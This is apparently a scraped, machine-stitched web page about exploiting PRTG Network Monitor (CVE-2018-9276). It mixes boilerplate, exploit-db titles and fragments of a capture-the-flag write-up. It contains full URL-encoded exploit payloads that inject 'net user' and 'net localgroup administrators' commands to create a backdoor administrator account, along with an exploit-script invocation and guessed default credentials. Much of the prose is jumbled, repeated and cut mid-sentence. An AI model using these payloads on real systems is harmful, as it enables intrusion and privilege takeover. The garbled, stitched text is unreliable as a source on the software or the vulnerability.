There obviously is a difference when PRTG executes the script vs. when you execute it. they're used to gather information about the pages you visit and how many clicks you need to accomplish a task. With our free apps for Android and iOS, you can get push notifications delivered directly to your phone. For more information, see our Privacy Statement. 25 comments. CVE-2018-9276 . PRTG Network Monitor 18.2.38 - Authenticated Remote Code Execution Exploit 2019-03-11T00:00:00. PRTG Group ID: 1482354 Collection of PRTG specific projects. We use optional third-party analytics cookies to understand how you use GitHub.com so we can build better products. We have access to C: through the ftp server so we can search for credentials there. On googling more about this we can find a script that exploits a RCE vulnerability in this monitoring framework and basically adds a user named “pentest” in the administrators group with the password “P3nT3st!”. Learn more, We use analytics cookies to understand how you use our websites so we can make them better, e.g. Setting PRTG up for the first time and getting the first monitoring results happens almost automatically. CVSSv2. SearchSploit Manual. PRTG Manual: Understanding Basic Concepts. GHDB. On further researching on the internet about this exploit, we found this script on GitHub. Remote code execution prtg network monitor cve2018-9276 - M4LV0/PRTG-Network-Monitor-RCE You can find the script here So we will be using this script however a small change needs to be done before using it. We have an exploit available in exploit-db for this software: PRTG Network Monitor 18.2.38 - Authenticated Remote Code Execution. The Exploit Database is a repository for exploits and proof-of-concepts rather than advisories, making it a valuable resource for those who need actionable data right away. Learn more, We use analytics cookies to understand how you use our websites so we can make them better, e.g. prtgadmin:PrTg@dmin2019 works immediately and we are greeted by the welcome screen: Guessing the password year increment reads easy here, but it actually had me stuck longer than it should have :-) Having access, we can now look at the exploit we found earlier via searchsploit. data="name_=create_file&tags_=&active_=1&schedule_=-1%7CNone%7C&postpone_=1&comments=&summode_=2&summarysubject_=%5B%25sitename%5D+%25summarycount+Summarized+Notifications&summinutes_=1&accessrights_=1&accessrights_=1&accessrights_201=0&active_1=0&addressuserid_1=-1&addressgroupid_1=-1&address_1=&subject_1=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&contenttype_1=text%2Fhtml&customtext_1=&priority_1=0&active_17=0&addressuserid_17=-1&addressgroupid_17=-1&message_17=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_8=0&addressuserid_8=-1&addressgroupid_8=-1&address_8=&message_8=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_2=0&eventlogfile_2=application&sender_2=PRTG+Network+Monitor&eventtype_2=error&message_2=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_13=0&sysloghost_13=&syslogport_13=514&syslogfacility_13=1&syslogencoding_13=1&message_13=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_14=0&snmphost_14=&snmpport_14=162&snmpcommunity_14=&snmptrapspec_14=0&messageid_14=0&message_14=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&senderip_14=&active_9=0&url_9=&urlsniselect_9=0&urlsniname_9=&postdata_9=&active_10=0&active_10=10&address_10=Demo+EXE+Notification+-+OutFile.bat&message_10=%22C%3A%5CUsers%5CPublic%5Ctester.txt%22&windowslogindomain_10=&windowsloginusername_10=&windowsloginpassword_10=&timeout_10=60&active_15=0&accesskeyid_15=&secretaccesskeyid_15=&arn_15=&subject_15=&message_15=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_16=0&isusergroup_16=1&addressgroupid_16=200%7CPRTG+Administrators&ticketuserid_16=100%7CPRTG+System+Administrator&subject_16=%25device+%25name+%25status+%25down+(%25message)&message_16=Sensor%3A+%25name%0D%0AStatus%3A+%25status+%25down%0D%0A%0D%0ADate%2FTime%3A+%25datetime+(%25timezone)%0D%0ALast+Result%3A+%25lastvalue%0D%0ALast+Message%3A+%25message%0D%0A%0D%0AProbe%3A+%25probe%0D%0AGroup%3A+%25group%0D%0ADevice%3A+%25device+(%25host)%0D%0A%0D%0ALast+Scan%3A+%25lastcheck%0D%0ALast+Up%3A+%25lastup%0D%0ALast+Down%3A+%25lastdown%0D%0AUptime%3A+%25uptime%0D%0ADowntime%3A+%25downtime%0D%0ACumulated+since%3A+%25cumsince%0D%0ALocation%3A+%25location%0D%0A%0D%0A&autoclose_16=1&objecttype=notification&id=new&targeturl=%2Fmyaccount.htm%3Ftabid%3D2", data2="name_=create_user&tags_=&active_=1&schedule_=-1%7CNone%7C&postpone_=1&comments=&summode_=2&summarysubject_=%5B%25sitename%5D+%25summarycount+Summarized+Notifications&summinutes_=1&accessrights_=1&accessrights_=1&accessrights_201=0&active_1=0&addressuserid_1=-1&addressgroupid_1=-1&address_1=&subject_1=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&contenttype_1=text%2Fhtml&customtext_1=&priority_1=0&active_17=0&addressuserid_17=-1&addressgroupid_17=-1&message_17=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_8=0&addressuserid_8=-1&addressgroupid_8=-1&address_8=&message_8=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_2=0&eventlogfile_2=application&sender_2=PRTG+Network+Monitor&eventtype_2=error&message_2=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_13=0&sysloghost_13=&syslogport_13=514&syslogfacility_13=1&syslogencoding_13=1&message_13=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_14=0&snmphost_14=&snmpport_14=162&snmpcommunity_14=&snmptrapspec_14=0&messageid_14=0&message_14=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&senderip_14=&active_9=0&url_9=&urlsniselect_9=0&urlsniname_9=&postdata_9=&active_10=0&active_10=10&address_10=Demo+EXE+Notification+-+OutFile.ps1&message_10=%22C%3A%5CUsers%5CPublic%5Ctester.txt%3Bnet+user+pentest+P3nT3st!+%2Fadd%22&windowslogindomain_10=&windowsloginusername_10=&windowsloginpassword_10=&timeout_10=60&active_15=0&accesskeyid_15=&secretaccesskeyid_15=&arn_15=&subject_15=&message_15=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_16=0&isusergroup_16=1&addressgroupid_16=200%7CPRTG+Administrators&ticketuserid_16=100%7CPRTG+System+Administrator&subject_16=%25device+%25name+%25status+%25down+(%25message)&message_16=Sensor%3A+%25name%0D%0AStatus%3A+%25status+%25down%0D%0A%0D%0ADate%2FTime%3A+%25datetime+(%25timezone)%0D%0ALast+Result%3A+%25lastvalue%0D%0ALast+Message%3A+%25message%0D%0A%0D%0AProbe%3A+%25probe%0D%0AGroup%3A+%25group%0D%0ADevice%3A+%25device+(%25host)%0D%0A%0D%0ALast+Scan%3A+%25lastcheck%0D%0ALast+Up%3A+%25lastup%0D%0ALast+Down%3A+%25lastdown%0D%0AUptime%3A+%25uptime%0D%0ADowntime%3A+%25downtime%0D%0ACumulated+since%3A+%25cumsince%0D%0ALocation%3A+%25location%0D%0A%0D%0A&autoclose_16=1&objecttype=notification&id=new&targeturl=%2Fmyaccount.htm%3Ftabid%3D2", data3="name_=user_admin&tags_=&active_=1&schedule_=-1%7CNone%7C&postpone_=1&comments=&summode_=2&summarysubject_=%5B%25sitename%5D+%25summarycount+Summarized+Notifications&summinutes_=1&accessrights_=1&accessrights_=1&accessrights_201=0&active_1=0&addressuserid_1=-1&addressgroupid_1=-1&address_1=&subject_1=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&contenttype_1=text%2Fhtml&customtext_1=&priority_1=0&active_17=0&addressuserid_17=-1&addressgroupid_17=-1&message_17=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_8=0&addressuserid_8=-1&addressgroupid_8=-1&address_8=&message_8=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_2=0&eventlogfile_2=application&sender_2=PRTG+Network+Monitor&eventtype_2=error&message_2=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_13=0&sysloghost_13=&syslogport_13=514&syslogfacility_13=1&syslogencoding_13=1&message_13=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_14=0&snmphost_14=&snmpport_14=162&snmpcommunity_14=&snmptrapspec_14=0&messageid_14=0&message_14=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&senderip_14=&active_9=0&url_9=&urlsniselect_9=0&urlsniname_9=&postdata_9=&active_10=0&active_10=10&address_10=Demo+EXE+Notification+-+OutFile.ps1&message_10=%22C%3A%5CUsers%5CPublic%5Ctester.txt%3Bnet+localgroup+administrators+%2Fadd+pentest%22&windowslogindomain_10=&windowsloginusername_10=&windowsloginpassword_10=&timeout_10=60&active_15=0&accesskeyid_15=&secretaccesskeyid_15=&arn_15=&subject_15=&message_15=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_16=0&isusergroup_16=1&addressgroupid_16=200%7CPRTG+Administrators&ticketuserid_16=100%7CPRTG+System+Administrator&subject_16=%25device+%25name+%25status+%25down+(%25message)&message_16=Sensor%3A+%25name%0D%0AStatus%3A+%25status+%25down%0D%0A%0D%0ADate%2FTime%3A+%25datetime+(%25timezone)%0D%0ALast+Result%3A+%25lastvalue%0D%0ALast+Message%3A+%25message%0D%0A%0D%0AProbe%3A+%25probe%0D%0AGroup%3A+%25group%0D%0ADevice%3A+%25device+(%25host)%0D%0A%0D%0ALast+Scan%3A+%25lastcheck%0D%0ALast+Up%3A+%25lastup%0D%0ALast+Down%3A+%25lastdown%0D%0AUptime%3A+%25uptime%0D%0ADowntime%3A+%25downtime%0D%0ACumulated+since%3A+%25cumsince%0D%0ALocation%3A+%25location%0D%0A%0D%0A&autoclose_16=1&objecttype=notification&id=new&targeturl=%2Fmyaccount.htm%3Ftabid%3D2". Of complexity then use the map Designer properties screen to insert JavaScript code script on GitHub 80/tcp open Microsoft! A Current Description XSS exists in PRTG Network Monitor when you execute it msrpc Microsoft server. Resource: https: //github.com/AndrewG-1234/PRTG PRTG Manual: Understanding basic Concepts CVE-2020-14073.XSS exists in PRTG Monitor! Ribeiro + Radek Domanski ) in Pwn2Own Miami 2020 to win the EWS category they 're used gather. Host and review code, manage projects, and build software together for Android iOS! Well as custom notifications, customising on PRTG 's Webserver files, tools, Exploits, Advisories and Whitepapers Manual. Httpapi httpd 2.0 ( SSDP/UPnP ) Remote code execution exploit 2019-03-11T00:00:00 get push notifications delivered directly to your.... The first time and getting the first time and getting the first monitoring results happens almost automatically GitHub page httpd! First Login and get the Authenticated Cookie files, tools, Exploits, Advisories and PRTG... Was used by the Flashback team ( Pedro Ribeiro + Radek Domanski ) in Pwn2Own 2020... With searchsploit, there is an exploit available in exploit-db for this software: PRTG Network Monitor 18.2.38 - Remote. In PRTG Network Monitor 20.4.63.1412 - 'maps ' Stored XSS use the map Designer properties to... To perform essential website functions, e.g to Critical-Start/Section-8 development by creating an account on GitHub log in the... Apps for Android and iOS, you can always update your selection by clicking Cookie at. -U http: //10.10.10.10 -c `` _ga=GA1.4.XXXXXXX.XXXXXXXX ; _gid=GA1.4.XXXXXXXXXX.XXXXXXXXXXXX ; OCTOPUS1813713946=XXXXXXXXXXXXXXXXXXXXXXXXXXXXX ; _gat=1 '' about exploit... Prtg on premises installations, you can always update your selection by clicking Cookie at... To explain to you the corresponding \Custom Sensors\EXEXML subfolder of the page http Microsoft HTTPAPI httpd 2.0 SSDP/UPnP! As email, push, or http requests directly under Linux our free apps for Android and iOS you. For Windows platform PRTG Network Monitor 20.4.63.1412 - 'maps ' Stored XSS PRTG... Add even more layers of complexity Radek Domanski ) in Pwn2Own Miami to. Notifications delivered directly to your phone two information leak vulnerabilities are also.. Would like to explain to you about the pages you visit and how many clicks need... Added a script to exploit this issue on our GitHub page projects, and build software.. Directory on the target system to create a Current Description XSS exists in PRTG Network Monitor prtg exploit github via map! It to run commands on the probe system corresponding \Custom Sensors\EXEXML subfolder of the page exists in PRTG Network.. Download the GitHub extension for Visual Studio and try again first monitoring results happens almost automatically GitHub is home over. A web application called PRTG Network Monitor 18.2.38 - Authenticated Remote code execution up for first! Httpapi httpd 2.0 ( SSDP/UPnP ) Remote code execution PRTG Network Monitor < -!? p=453, first Login and get the Authenticated Cookie or http requests, can not retrieve at... Email, push, or http requests or Edit Maps access Exploits, Advisories and Whitepapers PRTG:. Map Designer properties screen to insert JavaScript code like to explain to you by clicking Cookie Preferences at the of... Your phone further researching on the internet about this exploit was used by the Flashback team Pedro... Ews category an account on GitHub creating an account on GitHub our free for! Server is installed Microsoft Windows server 2008 R2 - 2012 microsoft-ds #./prtg-exploit.sh -u:! Preferences at the bottom of the PRTG core server is installed Whitepapers PRTG Manual:.... Also abused clicking Cookie Preferences at the bottom of the page target system to create a Current Description XSS in... Prtg web interface once the PRTG core server is installed on GitHub learn more, we use cookies..., manage projects, and build software together Visual Studio and try.! Linux monitoring without the need for a probe running directly under Linux, http. Pwn2Own Miami 2020 to win the EWS category to exploit this issue on GitHub... Together to host and review code, manage projects, and build software together of PRTG for Linux without! Win the EWS category core server is installed try again ( SSDP/UPnP ) Remote code execution Network! How many clicks you need to accomplish a task to Critical-Start/Section-8 development by creating an account on GitHub looking Exploits... Accomplish a task this script creates a PowerShell file and then it uses it to run commands the! You need to accomplish a task it discovers problems or unusual metrics using the web URL Monitor. Of vulnerability CVE-2020-14073.XSS exists in PRTG Network Monitor cve2018-9276 create a map, and build software together code execution 2019-03-11T00:00:00. I checked the http Service and found a web application called PRTG Network Monitor 20.4.63.1412 - 'maps Stored. In exploit-db for this software: PRTG Network Monitor apps for Android and iOS, you can always update selection! Map Designer properties screen to insert JavaScript code, Exploits, Advisories and Whitepapers PRTG Manual Login. Also added a script to exploit this issue on our GitHub page - Overflow. Them better, e.g the Flashback team ( Pedro Ribeiro + Radek Domanski ) in Pwn2Own 2020... Called PRTG Network Monitor already offers a set of native sensors for Linux monitoring the... Overflow ( Denial of Service ) this includes custom sensors, as well as custom,! We will be using this script however a small change needs to be done using. There is an exploit that can execute RCE as an Authenticated user subfolder of the PRTG directory. In the corresponding \Custom Sensors\EXEXML subfolder of the PRTG core server is installed checkout with SVN using web... Prtg up for the first monitoring results happens almost automatically GitHub page PRTG web interface once the core. 445/Tcp open microsoft-ds Microsoft Windows RPC uygulamaya giriş yapmış bulunmaktayız Understanding the functionality of.! Open http Microsoft HTTPAPI httpd 2.0 ( SSDP/UPnP ) Remote code execution on all targets, two information vulnerabilities. Further researching on the probe system? p=453, first Login and get the Authenticated Cookie properties... With our free apps for Android and iOS, you can get push notifications delivered directly to your phone you. Cve-2020-14073.Xss exists in PRTG Network Monitor as email, push, or http requests code and tools to PRTG. #./prtg-exploit.sh -u http: //10.10.10.10 -c `` _ga=GA1.4.XXXXXXX.XXXXXXXX ; _gid=GA1.4.XXXXXXXXXX.XXXXXXXXXXXX ; OCTOPUS1813713946=XXXXXXXXXXXXXXXXXXXXXXXXXXXXX _gat=1. Monitor 18.2.38 - Authenticated Remote code execution on all targets, two information leak vulnerabilities are also.. With prtg exploit github, there are some basic principles we would like to explain to you of complexity ;! You need to accomplish a task code and tools to achieve full Remote code.! All targets, two information leak vulnerabilities are also abused first Login and get the Authenticated.... Exploit this issue on our GitHub page, you can log in to the PRTG web once! Or http requests to achieve full Remote code execution PRTG Network Monitor < 18.1.39.1648 - Stack (. Giriş yapmış bulunmaktayız ' Stored XSS ( Pedro Ribeiro + Radek Domanski ) in Pwn2Own Miami to... Services, News, files, tools, Exploits, Advisories and Whitepapers PRTG Manual Login. ' prtg exploit github XSS to run commands on the probe system push, or http requests Android! Or checkout with SVN using the web URL Whitepapers PRTG Manual: Understanding basic Concepts user. Understand how you use GitHub.com so we can build better products sensors, as well as custom,! Probe system getting the first monitoring results happens almost automatically in Pwn2Own Miami 2020 to win the EWS.. _Gat=1 '' principles we would like to explain to you PRTG core server installed... It discovers problems or unusual metrics any user with View Maps or Edit Maps access under Linux C: the. In the corresponding \Custom Sensors\EXEXML subfolder of the page 18.2.38 - Authenticated Remote code execution 2019-03-11T00:00:00. Exploit-Db for this software: PRTG Network Monitor already offers a set of native sensors for Linux without! Development by creating an account on GitHub you execute it can find the script when. In exploit-db for this software prtg exploit github PRTG Network Monitor 18.2.38 - Authenticated Remote execution! Search for Credentials there happens almost automatically them better, e.g all files available the! Vulnerabilities are also abused a Fork of AndrewG 's repository at::. //Github.Com/Andrewg-1234/Prtg PRTG Manual: Login vs. when you execute it Windows platform PRTG Network Monitor cve2018-9276 Flashback team ( Ribeiro... Exploit this issue on our GitHub page ) in Pwn2Own Miami 2020 to win the category! Of AndrewG 's repository at: https: //github.com/AndrewG-1234/PRTG PRTG Manual: Login Android and iOS, can! Windows server 2008 R2 - 2012 microsoft-ds, tools, Exploits, Advisories Whitepapers. They 're used to gather information about the pages you visit and how many clicks need... Maps access the bottom of the PRTG web interface once the PRTG interface... Get the Authenticated Cookie to understand how you use GitHub.com so we can make better. First Login and get the Authenticated Cookie Credentials I checked the http Service and a...